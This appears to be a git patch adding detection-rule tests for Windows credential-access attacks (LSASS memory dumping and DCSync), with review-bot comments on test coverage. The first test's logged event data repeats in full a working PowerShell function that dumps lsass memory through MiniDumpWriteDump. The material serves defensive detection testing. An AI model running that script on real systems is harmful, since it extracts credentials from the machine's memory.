\"$($processname).dmp\" $processdumppath = join-path $dumpfilepath $processfilename $filestream = new-object io.filestream($processdumppath, [io.filemode]::create) $result = $minidumpwritedump.invoke($null, @($processhandle, $processid, $filestream.safefilehandle, $minidumpwithfullmemory, [intptr]::zero, [intptr]::zero, [intptr]::zero)) $filestream.close() if (-not $result) { $exception = new-object componentmodel.win32exception $exceptionmessage = \"$($exception.message) ($($processname):$($processid))\" # remove any partially written dump files. for example, a partial dump will be written # in the case when 32-bit powershell tries to dump a 64-bit process. 
remove-item $processdumppath -erroraction silentlycontinue throw $exceptionmessage } else { \"memdump complete!\" } }", "alert.key": "function memory($path) { $process = get-process lsass $dumpfilepath = $path $wer = [psobject].assembly.gettype('system.management.automation.windowserrorreporting') $wernativemethods = $wer.getnestedtype('nativemethods', 'nonpublic') $flags = [reflection.bindingflags] 'nonpublic, static' $minidumpwritedump = $wernativemethods.getmethod('minidumpwritedump', $flags) $minidumpwithfullmemory = [uint32] 2 # $processid = $process.id $processname = $process.name $processhandle = $process.handle $processfilename = \"$($processname).dmp\" $processdumppath = join-path $dumpfilepath $processfilename $filestream = new-object io.filestream($processdumppath, [io.filemode]::create) $result = $minidumpwritedump.invoke($null, @($processhandle, $processid, $filestream.safefilehandle, $minidumpwithfullmemory, [intptr]::zero, [intptr]::zero, [intptr]::zero)) $filestream.close() if (-not $result) { $exception = new-object componentmodel.win32exception $exceptionmessage = \"$($exception.message) ($($processname):$($processid))\" # remove any partially written dump files. for example, a partial dump will be written # in the case when 32-bit powershell tries to dump a 64-bit process. 
remove-item $processdumppath -erroraction silentlycontinue throw $exceptionmessage } else { \"memdump complete!\" } }", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: LSASS Memory", "correlation_name": "Credentials_MiniDumpWriteDump_Lsass", "correlation_type": "incident", "event_src.category": "Operating system", "event_src.fqdn": "msedgewin10", "event_src.host": "msedgewin10", "event_src.hostname": "msedgewin10", "event_src.subsys": "Microsoft-Windows-PowerShell/Operational", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "Credentials_MiniDumpWriteDump_Lsass|msedgewin10|S-1-5-21-3461203602-4096304019-2269080069-1000|", "incident.category": "DataLeakage", "incident.severity": "high", "object": "command", "object.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000", "object.fullpath": "C:\\Users\\Public\\lsass_wer_ps.ps1", "object.name": "lsass_wer_ps.ps1", "object.path": "C:\\Users\\Public\\", "object.process.cmdline": "function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = \"$($ProcessName).dmp\" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object 
ComponentModel.Win32Exception $ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { \"Memdump complete!\" } }", "object.process.id": "7008", "object.value": "function Memory($path) { $Process = Get-Process lsass $DumpFilePath = $path $WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting') $WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic') $Flags = [Reflection.BindingFlags] 'NonPublic, Static' $MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags) $MiniDumpWithFullMemory = [UInt32] 2 # $ProcessId = $Process.Id $ProcessName = $Process.Name $ProcessHandle = $Process.Handle $ProcessFileName = \"$($ProcessName).dmp\" $ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName $FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create) $Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle, $ProcessId, $FileStream.SafeFileHandle, $MiniDumpWithFullMemory, [IntPtr]::Zero, [IntPtr]::Zero, [IntPtr]::Zero)) $FileStream.Close() if (-not $Result) { $Exception = New-Object ComponentModel.Win32Exception $ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\" # Remove any partially written dump files. For example, a partial dump will be written # in the case when 32-bit PowerShell tries to dump a 64-bit process. Remove-Item $ProcessDumpPath -ErrorAction SilentlyContinue throw $ExceptionMessage } else { \"Memdump complete!\" } }", "status": "success", "subject": "account", "subject.account.id": "S-1-5-21-3461203602-4096304019-2269080069-1000"} \ No newline at end of file From 41cfcfd817490fc4b8006d756387c5c02a066128 Mon Sep 17 00:00:00 2001 
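Review bot: The new `expect` pins `"incident.aggregation.key": "Credentials_MiniDumpWriteDump_Lsass|msedgewin10|S-1-5-21-3461203602-4096304019-2269080069-1000|"` with an empty trailing component: the normalized 4104 event carries `subject.account.id` but no `subject.account.name`, so the last key field is empty and this test now freezes that as expected output. If the trailing `|` is deliberate, add a `#` comment above the `expect` line saying so; if the rule meant to aggregate on account name, it should fall back to the SID or omit the component, and the test should assert the corrected key. Separately, `alert.key` is asserted as the full lower-cased script text, so any whitespace or casing difference in a future sample produces a distinct key; a comment stating why the full text, rather than `object.id` or `object.fullpath`, is the key would help the next reader judge that choice.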
From: shadow2033 <135636880+shadow2033@users.noreply.github.com>
Date: Thu, 27 Jul 2023 14:01:26 +0300
Subject: [PATCH 05/57] =?UTF-8?q?=D0=94=D0=BE=D0=B1=D0=B0=D0=B2=D0=BB?= =?UTF-8?q?=D0=B5=D0=BD=D1=8B=20=D0=BC=D0=BE=D0=B4=D1=83=D0=BB=D1=8C=D0=BD?= =?UTF-8?q?=D1=8B=D0=B5=20=D1=82=D0=B5=D1=81=D1=82=D1=8B=20=D0=B4=D0=BB?= =?UTF-8?q?=D1=8F=20=D0=BF=D1=80=D0=B0=D0=B2=D0=B8=D0=BB=D0=B0=20(DCSync)?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
.../mitre_attck_cred_access/DCSync/tests/test_1.sc | 4 ++++
.../mitre_attck_cred_access/DCSync/tests/test_2.sc | 4 ++++
.../mitre_attck_cred_access/DCSync/tests/test_3.sc | 5 +++++
.../mitre_attck_cred_access/DCSync/tests/test_4.sc | 4 ++++
.../mitre_attck_cred_access/DCSync/tests/test_5.sc | 4 ++++
.../mitre_attck_cred_access/DCSync/tests/test_6.sc | 4 ++++
6 files changed, 25 insertions(+)
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_1.sc
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_2.sc
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_3.sc
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_4.sc
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_5.sc
create mode 100644 packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_6.sc
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_1.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_1.sc
new file mode 100644
index 00000000..3ecaf22a
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_1.sc
@@ -0,0 +1,4 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4662\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14080\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-08T02:10:43.4872170Z\"},\"EventRecordID\":\"202793\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"4632\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Administrator\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x40c6511\"},{\"Name\":\"ObjectServer\",\"text\":\"DS\"},{\"Name\":\"ObjectType\",\"text\":\"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"ObjectName\",\"text\":\"%{c6faf700-bfe4-452a-a766-424f84c29583}\"},{\"Name\":\"OperationType\",\"text\":\"Object Access\"},{\"Name\":\"HandleId\",\"text\":\"0x0\"},{\"Name\":\"AccessList\",\"text\":\"%%7688\"},{\"Name\":\"AccessMask\",\"text\":\"0x100\"},{\"Name\":\"Properties\",\"text\":\"%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"AdditionalInfo\",\"text\":\"-\"},{\"Name\":\"AdditionalInfo2\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "datafield2": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", 
"event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4662_An_operation_was_performed_on_an_object", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4662", "normalized": true, "object": "ds_object", "object.name": "c6faf700-bfe4-452a-a766-424f84c29583", "object.type": "19195a5b-6da0-11d0-afd3-00c04fd930c9", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T20:01:13.936Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "67921169", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-08T02:10:43.487Z", "type": "raw", "uuid": "692df50e-ed9b-402b-b6ff-fd8bc988fb6b"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "sync", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: DCSync", "correlation_name": "DCSync", "correlation_type": "incident", "datafield2": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DCSync|dc1.insecurebank.local|administrator", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "account", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "67921169"}
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_2.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_2.sc
new file mode 100644
index 00000000..46dd6b84
--- /dev/null
+++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_2.sc
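Review bot: The `expect 1` block asserts `"incident.category": "Undefined"` for a rule that fires on a 4662 carrying the DS-Replication-Get-Changes-All right (`{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}` in `datafield2`); `Undefined` reads like a value the rule never set, and the Lsass rule in the previous patch populates `"incident.category": "DataLeakage"`, so this test would keep passing against a missing category. Check the rule before pinning it; if `Undefined` is intended, a `#` comment on the `expect` line should say why. The sample's subject is `administrator` with a RID-500 SID on the domain controller, a positive case; if none of test_2–test_6 covers a domain-controller machine account performing the same replication call with `expect 0`, the rule's treatment of legitimate replication is unpinned.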
@@ -0,0 +1,4 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4662\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14080\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-08T02:10:43.4872170Z\"},\"EventRecordID\":\"202792\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"4632\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Administrator\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x40c6511\"},{\"Name\":\"ObjectServer\",\"text\":\"DS\"},{\"Name\":\"ObjectType\",\"text\":\"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"ObjectName\",\"text\":\"%{c6faf700-bfe4-452a-a766-424f84c29583}\"},{\"Name\":\"OperationType\",\"text\":\"Object Access\"},{\"Name\":\"HandleId\",\"text\":\"0x0\"},{\"Name\":\"AccessList\",\"text\":\"%%7688\"},{\"Name\":\"AccessMask\",\"text\":\"0x100\"},{\"Name\":\"Properties\",\"text\":\"%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"AdditionalInfo\",\"text\":\"-\"},{\"Name\":\"AdditionalInfo2\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "datafield2": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", 
"event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4662_An_operation_was_performed_on_an_object", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4662", "normalized": true, "object": "ds_object", "object.name": "c6faf700-bfe4-452a-a766-424f84c29583", "object.type": "19195a5b-6da0-11d0-afd3-00c04fd930c9", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T20:04:28.295Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "67921169", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-08T02:10:43.487Z", "type": "raw", "uuid": "03448835-b4b4-45de-b26a-063bc09f0e3b"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "sync", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: DCSync", "correlation_name": "DCSync", "correlation_type": "incident", "datafield2": "%%7688 {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DCSync|dc1.insecurebank.local|administrator", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "account", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "67921169"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_3.sc new file mode 100644 index 00000000..15174cf6 --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_3.sc 
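Review bot: The only comment in this test file is the scaffold placeholder (`# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь` — "your test goes here, say how many correlation events you expect"), so a reader cannot tell what distinguishes test_2 from test_1 and test_3 without decoding the Properties GUID by hand. Replace it with what the case actually pins, e.g. `# 4662 on DC1: Administrator reads with DS-Replication-Get-Changes (1131f6aa) -> one DCSync incident`. Worth stating explicitly because 1131f6aa (plain Get-Changes) is the replication right that replication partners and many legitimate accounts hold, while the one that lets secrets be pulled is Get-Changes-All (1131f6ad, the test_1 case); if the rule is meant to fire on 1131f6aa alone, a comment saying so will stop the next maintainer from "fixing" it.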
@@ -0,0 +1,5 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\"},\"EventID\":\"4662\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14080\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-05-08T02:10:43.4872170Z\"},\"EventRecordID\":\"202791\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"444\",\"ThreadID\":\"4632\"},\"Channel\":\"Security\",\"Computer\":\"DC1.insecurebank.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-21-738609754-2819869699-4189121830-500\"},{\"Name\":\"SubjectUserName\",\"text\":\"Administrator\"},{\"Name\":\"SubjectDomainName\",\"text\":\"insecurebank\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x40c6511\"},{\"Name\":\"ObjectServer\",\"text\":\"DS\"},{\"Name\":\"ObjectType\",\"text\":\"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"ObjectName\",\"text\":\"%{c6faf700-bfe4-452a-a766-424f84c29583}\"},{\"Name\":\"OperationType\",\"text\":\"Object Access\"},{\"Name\":\"HandleId\",\"text\":\"0x0\"},{\"Name\":\"AccessList\",\"text\":\"%%7688\"},{\"Name\":\"AccessMask\",\"text\":\"0x100\"},{\"Name\":\"Properties\",\"text\":\"%%7688 {89e95b76-444d-4c62-991a-0facbeda640c} {19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"AdditionalInfo\",\"text\":\"-\"},{\"Name\":\"AdditionalInfo2\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "datafield2": "%%7688 {89e95b76-444d-4c62-991a-0facbeda640c} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.fqdn": "dc1.insecurebank.local", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", 
"event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4662_An_operation_was_performed_on_an_object", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4662", "normalized": true, "object": "ds_object", "object.name": "c6faf700-bfe4-452a-a766-424f84c29583", "object.type": "19195a5b-6da0-11d0-afd3-00c04fd930c9", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T20:13:38.695Z", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "67921169", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-05-08T02:10:43.487Z", "type": "raw", "uuid": "3f90421b-c6b0-48a7-bc47-94ea9c013212"} + +# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "sync", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: DCSync", "correlation_name": "DCSync", "correlation_type": "incident", "datafield2": "%%7688 {89e95b76-444d-4c62-991a-0facbeda640c} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.host": "dc1.insecurebank.local", "event_src.hostname": "dc1", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DCSync|dc1.insecurebank.local|administrator", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "account", "status": "success", "subject": "account", "subject.account.domain": "insecurebank", "subject.account.id": "S-1-5-21-738609754-2819869699-4189121830-500", "subject.account.name": "administrator", "subject.account.session_id": "67921169"} + diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_4.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_4.sc new file mode 100644 index 00000000..fe2d713d --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_4.sc 
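Review bot: Every DCSync case added in this batch is positive (`expect 1`), so nothing pins the rule's filter — a 4662 with the same ObjectType, AccessMask 0x100 and ObjectServer DS but a Properties GUID that is not one of the replication rights should be asserted with `expect 0`, and so should a record whose SubjectUserName ends in `$` if computer accounts are meant to be excluded. Without such a case, a regression that drops the Properties match entirely would still pass this suite. The placeholder comment `# Тут будет твой тест...` should likewise become a one-line description, e.g. `# 4662 on DC1: Administrator reads with DS-Replication-Get-Changes-In-Filtered-Set (89e95b76) -> one DCSync incident`.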
@@ -0,0 +1,4 @@ +{"action": "access", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Security-Auditing\",\"Guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\"},\"EventID\":\"4662\",\"Version\":\"0\",\"Level\":\"0\",\"Task\":\"14080\",\"Opcode\":\"0\",\"Keywords\":\"0x8020000000000000\",\"TimeCreated\":{\"SystemTime\":\"2023-06-05T19:35:22.922876700Z\"},\"EventRecordID\":\"102112090\",\"Correlation\":{\"ActivityID\":\"{0BEB71D4-90D6-43F9-A57E-CE8CF1C42913}\"},\"Execution\":{\"ProcessID\":\"572\",\"ThreadID\":\"8132\"},\"Channel\":\"Security\",\"Computer\":\"ecsb003006a9.dc.atomic.local\",\"Security\":\"\"},\"EventData\":{\"Data\":[{\"Name\":\"SubjectUserSid\",\"text\":\"S-1-5-18\"},{\"Name\":\"SubjectUserName\",\"text\":\"ECSB003006A9$\"},{\"Name\":\"SubjectDomainName\",\"text\":\"DC\"},{\"Name\":\"SubjectLogonId\",\"text\":\"0x164d623881\"},{\"Name\":\"ObjectServer\",\"text\":\"DS\"},{\"Name\":\"ObjectType\",\"text\":\"%{19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"ObjectName\",\"text\":\"%{b5f76dbe-2a2e-4625-ab2a-66c5d1c71765}\"},{\"Name\":\"OperationType\",\"text\":\"Object Access\"},{\"Name\":\"HandleId\",\"text\":\"0x0\"},{\"Name\":\"AccessList\",\"text\":\"%%7688\"},{\"Name\":\"AccessMask\",\"text\":\"0x100\"},{\"Name\":\"Properties\",\"text\":\"%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}\"},{\"Name\":\"AdditionalInfo\",\"text\":\"-\"},{\"Name\":\"AdditionalInfo2\"}]}}}", "category.generic": "Directory Service Object", "category.high": "System Management", "category.low": "Manipulation", "datafield2": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.fqdn": "ecsb003006a9.dc.atomic.local", "event_src.host": "ecsb003006a9.dc.atomic.local", "event_src.hostname": "ecsb003006a9", "event_src.subsys": "Security", 
"event_src.title": "windows", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_4662_An_operation_was_performed_on_an_object", "importance": "medium", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "4662", "normalized": true, "object": "ds_object", "object.name": "b5f76dbe-2a2e-4625-ab2a-66c5d1c71765", "object.type": "19195a5b-6da0-11d0-afd3-00c04fd930c9", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-05T20:43:33.529Z", "status": "success", "subject": "account", "subject.account.domain": "dc", "subject.account.id": "S-1-5-18", "subject.account.name": "ecsb003006a9$", "subject.account.session_id": "95787563137", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2023-06-05T19:35:22.922Z", "type": "raw", "uuid": "90de9227-1ba6-4678-aa7a-521819d549a3"} + +# Тут будет твой тест. В секции expect укажи сколько и каких корреляционных событий ты ожидаешь +expect 1 {"action": "sync", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "OS Credential Dumping: DCSync", "correlation_name": "DCSync", "correlation_type": "incident", "datafield2": "%%7688 {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}", "datafield5": "0x100", "event_src.category": "Operating system", "event_src.host": "ecsb003006a9.dc.atomic.local", "event_src.hostname": "ecsb003006a9", "event_src.subsys": "Security", "event_src.title": "windows", "event_src.vendor": "microsoft", "importance": "high", "incident.aggregation.key": "DCSync|ecsb003006a9.dc.atomic.local|ecsb003006a9$", "incident.aggregation.timeout": 600, "incident.category": "Undefined", "incident.severity": "high", "object": "account", "status": "success", "subject": "account", "subject.account.domain": "dc", "subject.account.id": "S-1-5-18", "subject.account.name": 
"ecsb003006a9$", "subject.account.session_id": "95787563137"} diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_5.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_5.sc new file mode 100644 index 00000000..e464f5ba --- /dev/null +++ b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/DCSync/tests/test_5.sc 
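Review bot: This case asserts a high-severity DCSync incident for a 4662 whose subject is S-1-5-18 / `ECSB003006A9$` on `ecsb003006a9.dc.atomic.local`, i.e. the domain controller's own machine account, in its LocalSystem context, reading with DS-Replication-Get-Changes-All on its own host. That is the shape of routine inter-DC replication and is the standard exclusion in DCSync detections (subject name ending in `$`, plus AAD Connect `MSOL_*` accounts); pinning `expect 1` here locks the rule into firing on it. If alerting on machine accounts is deliberate, record that in the test comment (`# DC machine account replicating: rule intentionally does not exclude computer accounts`); otherwise this record is the natural `expect 0` case, and the positive case should keep a non-machine subject as in test_1–test_3.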
